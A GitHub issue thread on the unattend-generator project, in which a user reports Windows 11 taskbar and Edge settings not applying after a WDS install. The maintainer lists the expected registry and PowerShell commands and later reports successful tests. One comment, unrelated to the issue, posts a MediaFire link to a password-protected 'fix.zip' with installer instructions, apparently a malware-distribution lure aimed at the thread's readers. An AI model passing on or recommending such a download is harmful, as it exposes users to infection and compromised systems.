### ISSUE TITLE
"NEW" settings ignored

### ISSUE THREAD

**Issue by medo145** [cschneegans/unattend-generator#41]
Installed Win11 Enterprise 23H2 via WDS.

"Left-align the taskbar in Windows 11"
Taskbar was center aligned.

Delete preset icons (like Edge, Explorer, Outlook, Microsoft Store) from the taskbar
Edge icon on taskbar and start menu.

Hide Edge First Run Experience
Edge first run questions popped up.

Every other customization seems to have applied properly. Any thoughts?

**Comment by cschneegans** [comment]
I have never used WDS. Also, I am unable to test with Windows 11 Enterprise at the moment because when I try to install from the `22631.2428.231001-0608.23H2_NI_RELEASE_SVC_REFRESH_CLIENTENTERPRISEEVAL_OEMRET_x64FRE_en-us.iso` evaluation image in VMware, Windows Setup repeatedly fails with this error message: “Windows cannot find the Microsoft Software License Terms.”

Anyway, the new settings should produce these commands in your autounattend.xml file:

```
<Path>powershell.exe -NoProfile -Command "Get-Content -LiteralPath 'C:\Windows\Setup\Scripts\DeleteTaskbarIcons.ps1' -Raw | Invoke-Expression;"</Path>
<Path>reg.exe add "HKU\DefaultUser\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarAl /t REG_DWORD /d 0 /f</Path>
<Path>reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Edge" /v HideFirstRunExperience /t REG_DWORD /d 1 /f</Path>
```

Make sure that these commands are there. Or better, attach your autounattend.xml here.

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cschneegans** [comment]
I have now tested this with the `26100.1.240331-1435.ge_release_CLIENT_ENTERPRISES_OEM_x64FRE_en-us.iso` image (24H2) and a valid Enterprise key – the “NEW” settings work flawlessly. They have also worked with the publicly available `Win11_23H2_English_x64v2.iso` image.

If there is a problem, I believe it is related to WDS, which I will not dive into.
